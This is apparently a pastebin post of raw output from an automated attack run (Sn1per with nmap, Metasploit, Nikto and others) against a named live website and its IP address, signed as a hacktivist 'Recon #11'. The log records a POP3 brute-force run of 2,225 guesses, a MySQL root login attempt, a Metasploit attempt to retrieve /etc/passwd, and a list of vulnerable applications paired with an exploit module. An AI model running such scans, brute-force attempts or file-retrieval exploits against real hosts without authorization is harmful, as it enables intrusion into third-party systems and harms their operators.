  1661. |_[ + ] [ 77 / 100 ]-[19:41:19] [ - ]
  1662. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/29074/index.html ]
  1663. |_[ + ] Exploit::
  1664. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1665. |_[ + ] More details:: / - / , ISP:
  1666. |_[ + ] Found:: UNIDENTIFIED
  1667.  
  1668. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1669. |_[ + ] [ 78 / 100 ]-[19:41:22] [ - ]
  1670. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/25073/index.html ]
  1671. |_[ + ] Exploit::
  1672. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1673. |_[ + ] More details:: / - / , ISP:
  1674. |_[ + ] Found:: UNIDENTIFIED
  1675.  
  1676. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1677. |_[ + ] [ 79 / 100 ]-[19:41:25] [ - ]
  1678. |_[ + ] Target:: [ http://www.vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/24846/index.html ]
  1679. |_[ + ] Exploit::
  1680. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1681. |_[ + ] More details:: / - / , ISP:
  1682. |_[ + ] Found:: UNIDENTIFIED
  1683.  
  1684. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1685. |_[ + ] [ 80 / 100 ]-[19:41:27] [ - ]
  1686. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x94x8749&s=60&u=http://galleries.payserve.com/1/37611/27082/index.html ]
  1687. |_[ + ] Exploit::
  1688. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1689. |_[ + ] More details:: / - / , ISP:
  1690. |_[ + ] Found:: UNIDENTIFIED
  1691.  
  1692. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1693. |_[ + ] [ 81 / 100 ]-[19:41:29] [ - ]
  1694. |_[ + ] Target:: [ http://www.vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/24214/index.html ]
  1695. |_[ + ] Exploit::
  1696. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1697. |_[ + ] More details:: / - / , ISP:
  1698. |_[ + ] Found:: UNIDENTIFIED
  1699.  
  1700. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1701. |_[ + ] [ 82 / 100 ]-[19:41:31] [ - ]
  1702. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/28882/index.html ]
  1703. |_[ + ] Exploit::
  1704. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1705. |_[ + ] More details:: / - / , ISP:
  1706. |_[ + ] Found:: UNIDENTIFIED
  1707.  
  1708. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1709. |_[ + ] [ 83 / 100 ]-[19:41:34] [ - ]
  1710. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/28555/index.html ]
  1711. |_[ + ] Exploit::
  1712. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1713. |_[ + ] More details:: / - / , ISP:
  1714. |_[ + ] Found:: UNIDENTIFIED
  1715.  
  1716. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1717. |_[ + ] [ 84 / 100 ]-[19:41:36] [ - ]
  1718. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/23364/index.html ]
  1719. |_[ + ] Exploit::
  1720. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1721. |_[ + ] More details:: / - / , ISP:
  1722. |_[ + ] Found:: UNIDENTIFIED
  1723.  
  1724. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1725. |_[ + ] [ 85 / 100 ]-[19:41:38] [ - ]
  1726. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/24044/index.html ]
  1727. |_[ + ] Exploit::
  1728. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1729. |_[ + ] More details:: / - / , ISP:
  1730. |_[ + ] Found:: UNIDENTIFIED
  1731.  
  1732. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1733. |_[ + ] [ 86 / 100 ]-[19:41:41] [ - ]
  1734. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x154x4737&s=60&u=http://galleries.payserve.com/1/37611/24928/index.html ]
  1735. |_[ + ] Exploit::
  1736. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1737. |_[ + ] More details:: / - / , ISP:
  1738. |_[ + ] Found:: UNIDENTIFIED
  1739.  
  1740. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1741. |_[ + ] [ 87 / 100 ]-[19:41:43] [ - ]
  1742. |_[ + ] Target:: [ http://www.vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/22971/index.html ]
  1743. |_[ + ] Exploit::
  1744. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1745. |_[ + ] More details:: / - / , ISP:
  1746. |_[ + ] Found:: UNIDENTIFIED
  1747.  
  1748. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1749. |_[ + ] [ 88 / 100 ]-[19:41:45] [ - ]
  1750. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x86x6363&s=60&u=http://galleries.payserve.com/1/37611/25782/index.html ]
  1751. |_[ + ] Exploit::
  1752. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1753. |_[ + ] More details:: / - / , ISP:
  1754. |_[ + ] Found:: UNIDENTIFIED
  1755.  
  1756. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1757. |_[ + ] [ 89 / 100 ]-[19:41:48] [ - ]
  1758. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x59x3760&s=60&u=http://galleries.payserve.com/1/37611/24378/index.html ]
  1759. |_[ + ] Exploit::
  1760. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1761. |_[ + ] More details:: / - / , ISP:
  1762. |_[ + ] Found:: UNIDENTIFIED
  1763.  
  1764. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1765. |_[ + ] [ 90 / 100 ]-[19:41:50] [ - ]
  1766. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/24484/index.html ]
  1767. |_[ + ] Exploit::
  1768. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1769. |_[ + ] More details:: / - / , ISP:
  1770. |_[ + ] Found:: UNIDENTIFIED
  1771.  
  1772. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1773. |_[ + ] [ 91 / 100 ]-[19:41:53] [ - ]
  1774. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/24307/index.html ]
  1775. |_[ + ] Exploit::
  1776. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1777. |_[ + ] More details:: / - / , ISP:
  1778. |_[ + ] Found:: UNIDENTIFIED
  1779.  
  1780. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1781. |_[ + ] [ 92 / 100 ]-[19:41:55] [ - ]
  1782. |_[ + ] Target:: [ http://www.vcteens.com/rt/engine/thumb.php?l=tmx5x67x304&s=60&u=http://galleries.payserve.com/1/37611/22690/index.html ]
  1783. |_[ + ] Exploit::
  1784. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1785. |_[ + ] More details:: / - / , ISP:
  1786. |_[ + ] Found:: UNIDENTIFIED
  1787.  
  1788. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1789. |_[ + ] [ 93 / 100 ]-[19:41:57] [ - ]
  1790. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/25389/index.html ]
  1791. |_[ + ] Exploit::
  1792. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1793. |_[ + ] More details:: / - / , ISP:
  1794. |_[ + ] Found:: UNIDENTIFIED
  1795.  
  1796. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1797. |_[ + ] [ 94 / 100 ]-[19:41:59] [ - ]
  1798. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/29445/index.html ]
  1799. |_[ + ] Exploit::
  1800. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1801. |_[ + ] More details:: / - / , ISP:
  1802. |_[ + ] Found:: UNIDENTIFIED
  1803.  
  1804. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1805. |_[ + ] [ 95 / 100 ]-[19:42:02] [ - ]
  1806. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x118x3022&s=60&u=http://galleries.payserve.com/1/37611/24084/index.html ]
  1807. |_[ + ] Exploit::
  1808. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1809. |_[ + ] More details:: / - / , ISP:
  1810. |_[ + ] Found:: UNIDENTIFIED
  1811.  
  1812. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1813. |_[ + ] [ 96 / 100 ]-[19:42:04] [ - ]
  1814. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x88x17767&s=60&u=http://galleries.cumaholicteens.com/free/1/video/028MADELYN86482257/2/9/1008616/ ]
  1815. |_[ + ] Exploit::
  1816. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1817. |_[ + ] More details:: / - / , ISP:
  1818. |_[ + ] Found:: UNIDENTIFIED
  1819.  
  1820. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1821. |_[ + ] [ 97 / 100 ]-[19:42:06] [ - ]
  1822. |_[ + ] Target:: [ http://www.vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.payserve.com/1/37611/23362/index.html ]
  1823. |_[ + ] Exploit::
  1824. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1825. |_[ + ] More details:: / - / , ISP:
  1826. |_[ + ] Found:: UNIDENTIFIED
  1827.  
  1828. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1829. |_[ + ] [ 98 / 100 ]-[19:42:09] [ - ]
  1830. |_[ + ] Target:: [ http://vcteens.com/rt/engine/thumb.php?l=tmx5x91x3943&s=60&u=http://galleries.payserve.com/1/37611/24484/index.html ]
  1831. |_[ + ] Exploit::
  1832. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1833. |_[ + ] More details:: / - / , ISP:
  1834. |_[ + ] Found:: UNIDENTIFIED
  1835.  
  1836. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1837. |_[ + ] [ 99 / 100 ]-[19:42:11] [ - ]
  1838. |_[ + ] Target:: [ http://vcteens.com/cgi-bin/at3/out.cgi?s=60&u=http://galleries.seductive18.com/free/1/video/001ADRENALYN53366600/2/14663/1008616/ ]
  1839. |_[ + ] Exploit::
  1840. |_[ + ] Information Server:: HTTP/1.0 200 OK, , IP:108.59.1.220:80
  1841. |_[ + ] More details:: / - / , ISP:
  1842. |_[ + ] Found:: UNIDENTIFIED
  1843.  
  1844. [ INFO ] [ Shutting down ]
  1845. [ INFO ] [ End of process INURLBR at [15-09-2018 19:42:11]
  1846. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1847. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-vcteens.com.txt ]
  1848. |_________________________________________________________________________________________
  1849.  
  1850. \_________________________________________________________________________________________/
  1851.  
  1852. + -- --=[Port 110 opened... running tests...
  1853. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:42 EDT
  1854. Nmap scan report for vcteens.com (108.59.1.220)
  1855. Host is up (0.58s latency).
  1856.  
  1857. PORT STATE SERVICE VERSION
  1858. 110/tcp open pop3 Dovecot pop3d
  1859. | pop3-brute:
  1860. | Accounts: No valid accounts found
  1861. |_ Statistics: Performed 2225 guesses in 181 seconds, average tps: 12.0
  1862. |_pop3-capabilities: TOP SASL CAPA RESP-CODES PIPELINING STLS UIDL
  1863. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1864. Device type: WAP|general purpose
  1865. Running (JUST GUESSING): D-Link embedded (98%), TRENDnet embedded (98%), Linux 2.6.X (93%)
  1866. OS CPE: cpe:/h:dlink:dwl-624%2b cpe:/h:dlink:dwl-2000ap cpe:/h:trendnet:tew-432brp cpe:/o:linux:linux_kernel:2.6
  1867. Aggressive OS guesses: D-Link DWL-624+ or DWL-2000AP, or TRENDnet TEW-432BRP WAP (98%), Linux 2.6.18 - 2.6.22 (93%)
  1868. No exact OS matches for host (test conditions non-ideal).
  1869. Network Distance: 1 hop
  1870.  
  1871. TRACEROUTE (using port 443/tcp)
  1872. HOP RTT ADDRESS
  1873. 1 625.39 ms 108.59.1.220
  1874. #######################################################################################################################################
  1875.  
  1876. ^ ^
  1877. _ __ _ ____ _ __ _ _ ____
  1878. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  1879. | V V // o // _/ | V V // 0 // 0 // _/
  1880. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  1881. <
  1882. ...'
  1883.  
  1884. WAFW00F - Web Application Firewall Detection Tool
  1885.  
  1886. By Sandro Gauci && Wendel G. Henrique
  1887.  
  1888. Checking https://vcteens.com
  1889. #######################################################################################################################################
  1890.  
  1891.  
  1892.  
  1893. AVAILABLE PLUGINS
  1894. -----------------
  1895.  
  1896. PluginHeartbleed
  1897. PluginCertInfo
  1898. PluginChromeSha1Deprecation
  1899. PluginCompression
  1900. PluginSessionRenegotiation
  1901. PluginSessionResumption
  1902. PluginOpenSSLCipherSuites
  1903. PluginHSTS
  1904.  
  1905.  
  1906.  
  1907. CHECKING HOST(S) AVAILABILITY
  1908. -----------------------------
  1909.  
  1910. vcteens.com:443 => 108.59.1.220:443
  1911.  
  1912.  
  1913.  
  1914. SCAN RESULTS FOR VCTEENS.COM:443 - 108.59.1.220:443
  1915. ---------------------------------------------------
  1916.  
  1917. * Deflate Compression:
  1918. OK - Compression disabled
  1919.  
  1920. * Session Renegotiation:
  1921. Client-initiated Renegotiations: OK - Rejected
  1922. Secure Renegotiation: OK - Supported
  1923.  
  1924. * Certificate - Content:
  1925. SHA1 Fingerprint: 4ac1667dc84e8e46576379e8f070236ccc55e7b2
  1926. Common Name: youmydaddy.com
  1927. Issuer: Let's Encrypt Authority X3
  1928. Serial Number: 04A961F3CF9F48F21E52E39DCF8CE9B8BA64
  1929. Not Before: Jul 31 22:53:20 2018 GMT
  1930. Not After: Oct 29 22:53:20 2018 GMT
  1931. Signature Algorithm: sha256WithRSAEncryption
  1932. Public Key Algorithm: rsaEncryption
  1933. Key Size: 2048 bit
  1934. Exponent: 65537 (0x10001)
  1935. X509v3 Subject Alternative Name: {'DNS': ['www.youmydaddy.com', 'youmydaddy.com']}
  1936.  
  1937. * Certificate - Trust:
  1938. Hostname Validation: FAILED - Certificate does NOT match vcteens.com
  1939. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1940. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1941. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1942. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1943. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
  1944. Certificate Chain Received: ['youmydaddy.com']
  1945.  
  1946. * Certificate - OCSP Stapling:
  1947. NOT SUPPORTED - Server did not send back an OCSP response.
  1948.  
  1949. * Session Resumption:
  1950. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1951. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  1952.  
  1953. * SSLV2 Cipher Suites:
  1954. Server rejected all cipher suites.
  1955.  
  1956. * SSLV3 Cipher Suites:
  1957. Preferred:
  1958. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits
  1959. Accepted:
  1960. ECDHE-RSA-AES256-SHA ECDH-256 bits 256 bits
  1961. DHE-RSA-CAMELLIA256-SHA DH-2048 bits 256 bits
  1962. DHE-RSA-AES256-SHA DH-2048 bits 256 bits
  1963. CAMELLIA256-SHA - 256 bits
  1964. AES256-SHA - 256 bits
  1965. ECDHE-RSA-RC4-SHA ECDH-256 bits 128 bits
  1966. ECDHE-RSA-AES128-SHA ECDH-256 bits 128 bits
  1967. DHE-RSA-SEED-SHA DH-2048 bits 128 bits
  1968. DHE-RSA-CAMELLIA128-SHA DH-2048 bits 128 bits
  1969. DHE-RSA-AES128-SHA DH-2048 bits 128 bits
  1970. SEED-SHA - 128 bits
  1971. RC4-SHA - 128 bits
  1972. RC4-MD5 - 128 bits
  1973. IDEA-CBC-SHA - 128 bits
  1974. CAMELLIA128-SHA - 128 bits
  1975. AES128-SHA - 128 bits
  1976. ECDHE-RSA-DES-CBC3-SHA ECDH-256 bits 112 bits
  1977. EDH-RSA-DES-CBC3-SHA DH-2048 bits 112 bits
  1978. DES-CBC3-SHA - 112 bits
  1979.  
  1980.  
  1981.  
  1982. SCAN COMPLETED IN 14.35 S
  1983. -------------------------
  1984. Version: 1.11.11-static
  1985. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1986.  
  1987. Connected to 108.59.1.220
  1988.  
  1989. Testing SSL server vcteens.com on port 443 using SNI name vcteens.com
  1990.  
  1991. TLS Fallback SCSV:
  1992. Server does not support TLS Fallback SCSV
  1993.  
  1994. TLS renegotiation:
  1995. Session renegotiation not supported
  1996.  
  1997. TLS Compression:
  1998. Compression disabled
  1999.  
  2000. Heartbleed:
  2001. TLS 1.2 not vulnerable to heartbleed
  2002. TLS 1.1 not vulnerable to heartbleed
  2003. TLS 1.0 not vulnerable to heartbleed
  2004.  
  2005. Supported Server Cipher(s):
  2006. Preferred SSLv3 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  2007. Accepted SSLv3 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  2008. Accepted SSLv3 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  2009. Accepted SSLv3 256 bits AES256-SHA
  2010. Accepted SSLv3 256 bits CAMELLIA256-SHA
  2011. Accepted SSLv3 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  2012. Accepted SSLv3 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  2013. Accepted SSLv3 128 bits DHE-RSA-SEED-SHA DHE 2048 bits
  2014. Accepted SSLv3 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  2015. Accepted SSLv3 128 bits AES128-SHA
  2016. Accepted SSLv3 128 bits SEED-SHA
  2017. Accepted SSLv3 128 bits CAMELLIA128-SHA
  2018. Accepted SSLv3 128 bits IDEA-CBC-SHA
  2019. Accepted SSLv3 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
  2020. Accepted SSLv3 128 bits RC4-SHA
  2021. Accepted SSLv3 128 bits RC4-MD5
  2022. Accepted SSLv3 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  2023. Accepted SSLv3 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
  2024. Accepted SSLv3 112 bits DES-CBC3-SHA
  2025.  
  2026. SSL Certificate:
  2027. Signature Algorithm: sha256WithRSAEncryption
  2028. RSA Key Strength: 2048
  2029.  
  2030. Subject: youmydaddy.com
  2031. Altnames: DNS:www.youmydaddy.com, DNS:youmydaddy.com
  2032. Issuer: Let's Encrypt Authority X3
  2033.  
  2034. Not valid before: Jul 31 22:53:20 2018 GMT
  2035. Not valid after: Oct 29 22:53:20 2018 GMT
  2036. #######################################################################################################################################
  2037. [+] Screenshot saved to /usr/share/sniper/loot/vcteens.com/screenshots/vcteens.com-port443.jpg
  2038. + -- --=[Port 445 closed... skipping.
  2039. + -- --=[Port 512 closed... skipping.
  2040. + -- --=[Port 513 closed... skipping.
  2041. + -- --=[Port 514 closed... skipping.
  2042. + -- --=[Port 623 closed... skipping.
  2043. + -- --=[Port 624 closed... skipping.
  2044. + -- --=[Port 1099 closed... skipping.
  2045. + -- --=[Port 1433 closed... skipping.
  2046. + -- --=[Port 2049 closed... skipping.
  2047. + -- --=[Port 2121 closed... skipping.
  2048. + -- --=[Port 3306 opened... running tests...
  2049. Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-15 19:47 EDT
  2050. nmap: nse_nsock.cc:612: void receive_callback(nsock_pool, nsock_event, void*): Assertion `lua_status(L) == LUA_YIELD' failed.
  2051. modes/normal.sh : ligne 913 : 30220 Abandon nmap -A -sV -Pn --script=mysql* -p 3306 $TARGET
  2052.  
  2053.  
  2054. Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
  2055. EFLAGS: 00010046
  2056. eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
  2057. esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
  2058. ds: 0018 es: 0018 ss: 0018
  2059. Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
  2060.  
  2061.  
  2062. Stack: 90909090990909090990909090
  2063. 90909090990909090990909090
  2064. 90909090.90909090.90909090
  2065. 90909090.90909090.90909090
  2066. 90909090.90909090.09090900
  2067. 90909090.90909090.09090900
  2068. ..........................
  2069. cccccccccccccccccccccccccc
  2070. cccccccccccccccccccccccccc
  2071. ccccccccc.................
  2072. cccccccccccccccccccccccccc
  2073. cccccccccccccccccccccccccc
  2074. .................ccccccccc
  2075. cccccccccccccccccccccccccc
  2076. cccccccccccccccccccccccccc
  2077. ..........................
  2078. ffffffffffffffffffffffffff
  2079. ffffffff..................
  2080. ffffffffffffffffffffffffff
  2081. ffffffff..................
  2082. ffffffff..................
  2083. ffffffff..................
  2084.  
  2085.  
  2086. Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
  2087. Aiee, Killing Interrupt handler
  2088. Kernel panic: Attempted to kill the idle task!
  2089. In swapper task - not syncing
  2090.  
  2091.  
  2092. =[ metasploit v4.17.13-dev ]
  2093. + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
  2094. + -- --=[ 539 payloads - 42 encoders - 10 nops ]
  2095. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2096.  
  2097. RHOSTS => vcteens.com
  2098. [*] Scanned 1 of 1 hosts (100% complete)
  2099. [*] Auxiliary module execution completed
  2100. ERROR 1045 (28000): Access denied for user 'root'@'1.238.130.17' (using password: NO)
  2101. #######################################################################################################################################
  2102.  
  2103. # cowsay++
  2104. ____________
  2105. < metasploit >
  2106. ------------
  2107. \ ,__,
  2108. \ (oo)____
  2109. (__) )\
  2110. ||--|| *
  2111.  
  2112.  
  2113. =[ metasploit v4.17.13-dev ]
  2114. + -- --=[ 1808 exploits - 1028 auxiliary - 313 post ]
  2115. + -- --=[ 539 payloads - 42 encoders - 10 nops ]
  2116. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2117.  
  2118. RHOST => vcteens.com
  2119. RHOSTS => vcteens.com
  2120. [*] Attempting to retrieve /etc/passwd...
  2121. [*] The server returned: 200 Document follows
  2122. <h1>Error - Document follows</h1>
  2123. <p>This web server is running in SSL mode. Try the URL <a href='https://lcwmlm431.amhost.net:10000/'>https://lcwmlm431.amhost.net:10000/</a> instead.<br></p>
  2124.  
  2125. ######################################################################################################################################
  2126.  
  2127. I, [2018-09-15T19:47:52.266360 #30457] INFO -- : Initiating port scan
  2128. I, [2018-09-15T19:49:24.103460 #30457] INFO -- : Using nmap scan output file logs/nmap_output_2018-09-15_19-47-52.xml
  2129. I, [2018-09-15T19:49:24.104560 #30457] INFO -- : Discovered open port: 108.59.1.220:81
  2130. I, [2018-09-15T19:49:26.838851 #30457] INFO -- : Discovered open port: 108.59.1.220:443
  2131. I, [2018-09-15T19:49:28.637187 #30457] INFO -- : Discovered open port: 108.59.1.220:993
  2132. I, [2018-09-15T19:49:33.572761 #30457] INFO -- : Discovered open port: 108.59.1.220:995
  2133. I, [2018-09-15T19:49:38.421851 #30457] INFO -- : <<<Enumerating vulnerable applications>>>
  2134.  
  2135.  
  2136. --------------------------------------------------------
  2137. <<<Yasuo discovered following vulnerable applications>>>
  2138. --------------------------------------------------------
  2139. +-----------------+----------------------------------+------------------------------------------------+----------+----------+
  2140. | App Name | URL to Application | Potential Exploit | Username | Password |
  2141. +-----------------+----------------------------------+------------------------------------------------+----------+----------+
  2142. | Linksys WRT54GL | http://108.59.1.220:81/apply.cgi | ./auxiliary/admin/http/linksys_wrt54gl_exec.rb | | |
  2143. +-----------------+----------------------------------+------------------------------------------------+----------+----------+
  2144. ######################################################################################################################################
  2145. + Target IP: 108.59.1.220
  2146. + Target Hostname: www.vcteens.com
  2147. + Target Port: 80
  2148. + Start Time: 2018-09-15 12:21:58 (GMT-4)
  2149. ---------------------------------------------------------------------------------------------------------------------------------------
  2150. + Server: nginx/1.9.5
  2151. + Retrieved x-powered-by header: PHP/5.2.17
  2152. + The anti-clickjacking X-Frame-Options header is not present.
  2153. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  2154. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  2155. + Server leaks inodes via ETags, header found with file /, inode: 48360017, size: 3115, mtime: Mon May 28 08:18:26 2018
  2156. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
  2157. + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2158. + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2159. + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  2160. + OSVDB-3092: /cgi-bin/at3/signup.cgi: Default CGI, often with a hosting manager. No known problems, but host managers allow sys admin via web
  2161. + OSVDB-3268: /icons/: Directory indexing found.
  2162. + OSVDB-3233: /icons/README: Apache default file found.
  2163. + 27121 requests: 0 error(s) and 12 item(s) reported on remote host
  2164. + End Time: 2018-09-15 13:24:58 (GMT-4) (3780 seconds)
  2165. ---------------------------------------------------------------------------------------------------------------------------------------
  2166. #######################################################################################################################################
  2167. =======================================================================================================================================
  2168. | Domain: http://vcteens.com/
  2169. | Server: nginx/1.9.5
  2170. | IP: 108.59.1.220
  2171. =======================================================================================================================================
  2172. |
  2173. | Directory check:
  2174. | [+] CODE: 200 URL: http://vcteens.com/icons/
  2175. =======================================================================================================================================
  2176. |
  2177. | File check:
  2178. | [+] CODE: 200 URL: http://vcteens.com/error/HTTP_NOT_FOUND.html.var
  2179. | [+] CODE: 200 URL: http://vcteens.com/index.php
  2180. =======================================================================================================================================
  2181. ######################################################################################################################################
  2182. | E-mails:
  2183. | [+] E-mail Found: mike@hyperreal.org
  2184. | [+] E-mail Found: kevinh@kevcom.com
  2185. |
  2186. | External hosts:
  2187. | [+] External Host Found: http://
  2188. | [+] External Host Found: http://syndication.exoclick.com
  2189. | [+] External Host Found: http://c.statcounter.com
  2190. | [+] External Host Found: http://statcounter.com
  2191. | [+] External Host Found: http://httpd.apache.org
  2192. =======================================================================================================================================
  2193. #######################################################################################################################################
  2194. Anonymous JTSEC #OpDeathEathers full Recon #11
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement